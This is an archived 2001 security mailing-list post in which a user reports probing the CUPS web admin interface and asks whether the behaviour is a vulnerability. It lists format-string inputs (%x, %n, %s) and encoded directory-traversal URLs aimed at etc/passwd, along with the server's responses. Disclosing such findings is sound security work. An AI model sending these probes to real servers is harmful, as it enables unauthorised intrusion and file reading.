cupsd web admin and the % char

From: KF (dotslashat_private)
Date: Sat Jun 09 2001 - 09:58:27 PDT

  • Next message: KF: "suid scotty / ntping overflow"

    I have been playing with cupsd a little and came up with the following
     
    [d0tslash@linux d0tslash]$ uname -a
    Linux linux.insight.rr.com 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001
    i686 unknown
    [d0tslash@linux d0tslash]$ cat /etc/redhat-release Linux Mandrake
    release 8.0 (Traktopel) for i586
    
    The attached cupsd-hack.txt has my results...
    
    -KF
    
    Ok you need to authenticate to cups first in order to do this but my 
    question is is it an issue?
    
    /usr/sbin/cupsd
     /etc/rc.d/init.d/cups start
    
    http://localhost:631/admin/?op=%s
    Admin
    
    Unsupported administration operation "Ð/usr/lib/cups/cgi-bin/admin.cgi". 
    
    http://localhost:631/admin/?op=%x%f%n%d%s
    Admin
    
    Unsupported administration operation "õfõdÐ/usr/lib/cups/cgi-bin/admin.cgi". 
    
    http://localhost:631/admin/?op=%x%x%x%x%x%x
    Admin
    
    Unsupported administration operation "õxõxõx". 
    
    http://localhost:631/admin/?op=%c0%af..%c0%af..%co%af..%c0%af..%c0%af..%co%afetc/passwd
    Forbidden
    
    You don't have permission to access the resource on this server. 
    
    http://localhost:631/admin/?op=%c0
    Admin
    
    Unsupported administration operation "À". 
    
    http://localhost:631/admin/?op=%s&printer_name=zsdf
    Admin
    
    Unsupported administration operation "öprinter_name=zsdf". 
    
    http://localhost:631/printers/%c0%af
    À¯
    
    No printers 
    
    No Active Jobs 
    
    http://localhost:631?op=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/
    Not Found
    
    The requested resource was not found on this server. 
    



    This archive was generated by hypermail 2b30 : Sat Jun 09 2001 - 10:43:02 PDT